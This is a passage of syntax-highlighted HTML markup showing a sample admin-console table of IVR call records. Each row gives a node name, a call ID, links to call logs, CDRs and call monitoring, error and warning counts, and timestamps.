class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">sip<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unavailable<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">unknown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">invalid<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1542000470174023<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ERROR <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">WARN <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">vxml_exception <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">150908<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">05.236<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00.501<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">tr <\/span><span class=\"crayon-v\">bgcolor<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;eeeeee&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">tb0ocmp1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_2<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;call.do?action=monitor&amp;cid=vxi_dialog_0_32_634_2&amp;node=tb0ocmp1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Monitor<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">o2_ivr_0xxx<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">sip<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unavailable<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">unknown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">invalid<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1542000470852423<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ERROR <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">WARN <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">vxml_exception <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">150908<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">56.237<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">01.003<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">tb0ocmp0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;call.do?action=monitor&amp;cid=vxi_dialog_0_40_420_1&amp;node=tb0ocmp0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Monitor<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-140\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">o2_ivr_0xxx<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">sip<\/span><span class=\"crayon-o\">:<\/span><span 